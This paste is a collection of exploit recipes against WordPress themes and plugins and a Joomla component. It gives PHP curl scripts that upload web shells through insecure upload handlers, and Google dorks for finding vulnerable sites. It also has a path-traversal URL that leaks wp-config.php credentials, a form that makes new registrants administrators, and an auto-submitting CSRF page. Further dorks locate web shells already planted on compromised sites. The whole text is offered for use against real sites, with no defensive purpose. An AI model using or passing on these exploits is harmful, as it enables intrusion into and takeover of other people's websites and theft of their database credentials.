SHOW:
|
|
- or go back to the newest paste.
1 | YH=YH=YH=ANON=Yh=Yh=yH | |
2 | #YassineElHilali | |
3 | ||
4 | #1.Exploit Title:WordPress Font Uploader Shell Upload | |
5 | Google Dork : inurl:/wp-content/plugins/font-uploader/ | |
6 | code===> | |
7 | <?php | |
8 | ||
9 | $uploadfile="yourshellname.php.ttf"; | |
10 | $ch = | |
11 | curl_init("http://www.yourtarget.com/wp-content/plugins/font-uploader/font-upload.php"); | |
12 | curl_setopt($ch, CURLOPT_POST, true); | |
13 | curl_setopt($ch, CURLOPT_POSTFIELDS, | |
14 | array('font'=>"@$uploadfile", | |
15 | 'Submit'=>'submit')); | |
16 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
17 | $postResult = curl_exec($ch); | |
18 | curl_close($ch); | |
19 | print "$postResult"; | |
20 | ||
21 | ?> | |
22 | ======================================================== | |
23 | #2.Exploit Title:Wordpress plugin Arbitary File Upload All Version | |
24 | Google Dork: inurl:assets/uploadify/ site:.com [use your brain for dorking] | |
25 | ==>after going to your desire site u will find a file/folder [uploadify] u need to click there | |
26 | sample==>http://www.yourtarget.com/assets/themes/plugins/uploadify/uploadify.php | |
27 | code==> | |
28 | <?php | |
29 | $uploadfile="yourshell.php"; | |
30 | ||
31 | $ch = curl_init("http://www.abhaya.org/assets/themes/plugins/uploadify/uploadify.php"); | |
32 | curl_setopt($ch, CURLOPT_POST, true); | |
33 | curl_setopt($ch, CURLOPT_POSTFIELDS, | |
34 | array('Filedata'=>"@$uploadfile", | |
35 | 'folder'=>'/')); | |
36 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
37 | $postResult = curl_exec($ch); | |
38 | curl_close($ch); | |
39 | print "$postResult"; | |
40 | ||
41 | ?> | |
42 | ========================================================== | |
43 | #3.Exploit Title:Wordpress Atom Themes Arbitary File Upload | |
44 | Google Dork : inurl:"/wp-content/themes/atom/" | |
45 | code==> | |
46 | <?php | |
47 | $uploadfile="yourshell.php"; | |
48 | ||
49 | $ch = curl_init("http://www.yourtarget.com/wp-content/themes/atom/uploadify/uploadify.php"); | |
50 | curl_setopt($ch, CURLOPT_POST, true); | |
51 | curl_setopt($ch, CURLOPT_POSTFIELDS, | |
52 | array('Filedata'=>"@$uploadfile", | |
53 | 'folder'=>'/')); | |
54 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
55 | $postResult = curl_exec($ch); | |
56 | curl_close($ch); | |
57 | print "$postResult"; | |
58 | ||
59 | ?> | |
60 | ||
61 | Shell Access : http://www.yourtarget.com/wp-content/themes/atom/uploadify/uploads/randomnumber[ur shellname].php | |
62 | ============================================================= | |
63 | #4.Exploit Title:WordPress theme soulmedic Arbitrary File Download Vulnerability | |
64 | Google Dork:inurl:"/wp-content/themes/soulmedic/" | |
65 | http://www.yourtarget.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php | |
66 | ===>u will find database password/name of that server | |
67 | ================================================================ | |
68 | #5.Exploit Title:PHP File Upload Vulnerability | |
69 | Google Dork:inurl:images/jupload.php;guest100;guest100 | |
70 | http://www.yourtarget.com/images/jupload.php;guest100;guest100 [u need to remove this ;guest100;guest100] | |
71 | http://www.yourtarget.com/images/jupload.php [after removing ;guest100;guest100] | |
72 | if u find uploading option then u can upload your shell | |
73 | shell access==>http://www.yourtarget.com/images/shell.php | |
74 | ================================================================== | |
75 | #6.Exploit Title:Hades+ Framework Add Administrator | |
76 | Google multiple Dork: inurl:/wp-content/themes/appius/ | |
77 | inurl:/wp-content/themes/Consultant/ | |
78 | inurl:/wp-content/themes/appius1/ | |
79 | inurl:/wp-content/themes/archin/ | |
80 | inurl:/wp-content/themes/averin/ | |
81 | inurl:/wp-content/themes/dagda/ | |
82 | inurl:/wp-content/themes/echea/ | |
83 | inurl:/wp-content/themes/felici/ | |
84 | inurl:/wp-content/themes/kmp/ | |
85 | inurl:/wp-content/themes/kmp2/ | |
86 | inurl:/wp-content/themes/liberal/ | |
87 | inurl:/wp-content/themes/liberal-media-bias/ | |
88 | inurl:/wp-content/themes/linguini/ | |
89 | inurl:/wp-content/themes/livewire/ | |
90 | inurl:/wp-content/themes/majestics/ | |
91 | inurl:/wp-content/themes/mathis/ | |
92 | inurl:/wp-content/themes/mazine/ | |
93 | inurl:/wp-content/themes/Orchestra/ | |
94 | inurl:/wp-content/themes/shopsum/ | |
95 | inurl:/wp-content/themes/shotzz/ | |
96 | inurl:/wp-content/themes/test/ | |
97 | inurl:/wp-content/themes/Viteeo/ | |
98 | inurl:/wp-content/themes/vithy/ | |
99 | inurl:/wp-content/themes/yvora/ | |
100 | inurl:/wp-content/themes/sodales/ | |
101 | Exploit: | |
102 | <form action="http://www.yourtarget.com/wp-content/themes/[themename,i mean:/appius//Consultant//archin/etc etc]/hades_framework/option_panel/ajax.php" method="POST"> | |
103 | <input name="values[0][name]" value="users_can_register"> | |
104 | <input name="values[0][value]" value="1"> | |
105 | <input name="values[1][name]" value="admin_email"> | |
106 | <input name="values[1][value]" value="{%YOUR_EMAIL}"> | |
107 | <input name="values[2][name]" value="default_role"> | |
108 | <input name="values[2][value]" value="administrator"> | |
109 | <input name="action" value="save"> | |
110 | <input type="submit" value="Submit"> | |
111 | </form> | |
112 | Process==> | |
113 | 1.Change [themename,i mean:/appius//Consultant//archin/etc etc]vulnerable theme, [YOUR_EMAIL] with your email address. | |
114 | sample==>http://www.yourtarget.com/wp-content/themes/[replace the vulnerable themename with yourmailaddress]/hades_framework/option_panel/ajax.php | |
115 | 2. go to http://www.yourtarget.com/wp-login.php?action=register, [you will see the registration form]. | |
116 | 3. choose your username & email address and register. | |
117 | 4. go to your email, you will find your password. | |
118 | 5. then login & and upload your shell | |
119 | =============================================================== | |
120 | #7.Exploit Title: Wordpress Dandelion Themes Arbitry File Upload | |
121 | Google Dork: inurl:/wp-content/themes/dandelion/ | |
122 | Code==> | |
123 | <?php | |
124 | $uploadfile="yourshell.php"; | |
125 | $ch = curl_init("http://www.yourshell.com/wp-content/themes/dandelion/functions/upload-handler.php"); | |
126 | curl_setopt($ch, CURLOPT_POST, true); | |
127 | curl_setopt($ch, CURLOPT_POSTFIELDS, | |
128 | array('Filedata'=>"@$uploadfile")); | |
129 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
130 | $postResult = curl_exec($ch); | |
131 | curl_close($ch); | |
132 | print "$postResult"; | |
133 | ?> | |
134 | shell link=> http://www.yourshell.com/uploads/[years]/[month]/your_shell.php | |
135 | ===================================================================== | |
136 | #8.Exploit Title: Wordpress satoshi Themes Arbitry File Upload | |
137 | Google Dork: inurl:/wp-content/satoshi/dandelion/ | |
138 | Code==> | |
139 | <?php | |
140 | $uploadfile="yourshell.php"; | |
141 | $ch = curl_init("http://www.yourshell.com/wp-content/themes/satoshi/functions/upload-handler.php"); | |
142 | curl_setopt($ch, CURLOPT_POST, true); | |
143 | curl_setopt($ch, CURLOPT_POSTFIELDS, | |
144 | array('Filedata'=>"@$uploadfile")); | |
145 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
146 | $postResult = curl_exec($ch); | |
147 | curl_close($ch); | |
148 | print "$postResult"; | |
149 | ?> | |
150 | ======================================================================== | |
151 | #8.Exploit Title:Mosets Tree 2.1.6 (Joomla) Template Overwrite CSRF | |
152 | <?php | |
153 | /** | |
154 | * Mosets Tree 2.1.6 (Joomla) Template Overwrite CSRF | |
155 | * 3 October 2010 | |
156 | * jdc | |
157 | * | |
158 | * How it works - admin template form has no nonce | |
159 | * How to exploit - get a logged in admin to click the wrong link ;) | |
160 | * Patched in 2.1.7 | |
161 | */ | |
162 | // change these | |
163 | $target = 'http://localhost/joomla'; | |
164 | $exploit = '<?php echo phpinfo(); ?>'; | |
165 | /* page - any one of: | |
166 | page_addCategory | |
167 | page_addListing | |
168 | page_advSearchRedirect | |
169 | page_advSearchResults | |
170 | page_advSearch | |
171 | page_claim | |
172 | page_confirmDelete | |
173 | page_contactOwner | |
174 | page_errorListing | |
175 | page_error | |
176 | page_gallery | |
177 | page_image | |
178 | page_index | |
179 | page_listAlpha | |
180 | page_listing | |
181 | page_listListings | |
182 | page_ownerListing | |
183 | page_print | |
184 | page_recommend | |
185 | page_replyReview | |
186 | page_reportReview | |
187 | page_report | |
188 | page_searchByResults | |
189 | page_searchResults | |
190 | page_subCatIndex | |
191 | page_usersFavourites | |
192 | page_usersReview | |
193 | page_writeReview | |
194 | sub_alphaIndex | |
195 | sub_images | |
196 | sub_listingDetails | |
197 | sub_listings | |
198 | sub_listingSummary | |
199 | sub_map | |
200 | sub_reviews | |
201 | sub_subCats | |
202 | */ | |
203 | $page = 'page_print'; | |
204 | // don't change these | |
205 | $path = '/administrator/index.php'; | |
206 | $data = array( | |
207 | 'pagecontent' => $exploit, | |
208 | 'template' => 'm2', | |
209 | 'option' => 'com_mtree', | |
210 | 'task' => 'save_templatepage', | |
211 | 'page' => $page | |
212 | ); | |
213 | ?> | |
214 | <html> | |
215 | <body> | |
216 | <?php if (@$_GET['iframe']) : ?> | |
217 | <form id="csrf" action="<?php echo $target.$path; ?>" method="post"> | |
218 | <?php foreach ($data as $k => $v) : ?> | |
219 | <input type="text" value="<?php echo htmlspecialchars($v); ?>" | |
220 | name="<?php echo $k; ?>" /> | |
221 | <?php endforeach; ?> | |
222 | <script type="text/javascript"> | |
223 | document.forms[0].submit(); | |
224 | </script> | |
225 | </form> | |
226 | <?php else : ?> | |
227 | <h1>Mosets Tree 2.1.6 Template Overwrite CSRF Exploit</h1> | |
228 | <p>If you were logged in as admin, you just got owned!</p> | |
229 | <div style="display:none"> | |
230 | <iframe width="1" height="1" src="<?php __FILE__; ?>?iframe=1"></iframe> | |
231 | </div> | |
232 | <?php endif; ?> | |
233 | </body> | |
234 | </html> | |
235 | #9.Exploit Title:wordpress potential themes vuln upload | |
236 | 1.dork: inurl:/wp-content/themes/nuance/ | |
237 | exploit: /functions/jwpanel/scripts/valums_uploader/php.php | |
238 | ||
239 | 2. dork: inurl:/wp-content/themes/lightspeed/ | |
240 | exploit: /framework/_scripts/valums_uploader/php.php | |
241 | ||
242 | 3. dork: inurl:/wp-content/themes/saico/ | |
243 | exploit: /framework/_scripts/valums_uploader/php.php | |
244 | ||
245 | 4. dork: inurl:/wp-content/themes/eptonic/ | |
246 | exploit: /functions/jwpanel/scripts/valums_uploader/php.php | |
247 | ||
248 | 5. dork: inurl:/wp-content/themes/skinizer/ | |
249 | exploit: /framework/_scripts/valums_uploader/php.php | |
250 | ||
251 | 6. dork: inurl:/wp-content/themes/area53/ | |
252 | exploit: /framework/_scripts/valums_uploader/php.php | |
253 | ||
254 | 7. dork: inurl:/wp-content/themes/blinc/ | |
255 | exploit:/framework/_scripts/valums_uploader/php.php | |
256 | ||
257 | csrf from html: | |
258 | ||
259 | <form enctype="multipart/form-data" | |
260 | action="http://www.yourtarget.com/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php" method="post"> | |
261 | <input type="jpg" name="url" value="./" /><br /> | |
262 | Please choose a file: <input name="qqfile" type="file" /><br /> | |
263 | <input type="submit" value="upload" /> | |
264 | </form> | |
265 | it the url allows you to upload your shell then u can upload it or if it says any #Error then find another one | |
266 | shell link==> | |
267 | http://www.yourtarget.com/wp-content/themes/yourthemename/yourshellname.php | |
268 | http://www.yourtarget.com/wp-content/uploads/shell.php | |
269 | #10.Exploit Title:For Noob[Dorking shell] | |
270 | b374k m1n1 | |
271 | Quote: | |
272 | google dork : | |
273 | intitle:b374k m1n1 inurl:wp-content | |
274 | intitle:"index of /" "b374k.php" | |
275 | ||
276 | ||
277 | Dorking shell wso | |
278 | Quote: | |
279 | google dork : | |
280 | intitle:"Index of /uploads" "wso.php" | |
281 | intitle:"index of /" "wso.php" | |
282 | ||
283 | ||
284 | Dorking Shell Madspot | |
285 | Shell ini defaultnya tidak dipassword dan terindex google sehingga kita bisa dorking untuk menemukan shell ini. | |
286 | Quote: | |
287 | google dork : | |
288 | intitle:Madspot Security site:com | |
289 | ||
290 | ||
291 | Dorking Shell 1n73ct10n | |
292 | Quote: | |
293 | google dork : | |
294 | intitle:1n73ct10n inurl:wp-content | |
295 | intitle:"index of /" "1n73ct10n.php"] | |
296 | ########################################################################################### | |
297 | and u can find many tut on google for JCE/Revslider/Com_user/comfabrik/webdav/Jdownload | |
298 | But if u r a Pro in CMS/backendweb developer then u can make your own exploit for Joomla/wordpress/Drupal/woocommerce etc etc,but u need to know very clear idea of web apps/web apps development | |
299 | website is a huge thing[plugin/theme/component/widget/framework:joomla,wordpress,drupal,Bootstrap,phpBB,etc etc many high profile backend developer will reward you] |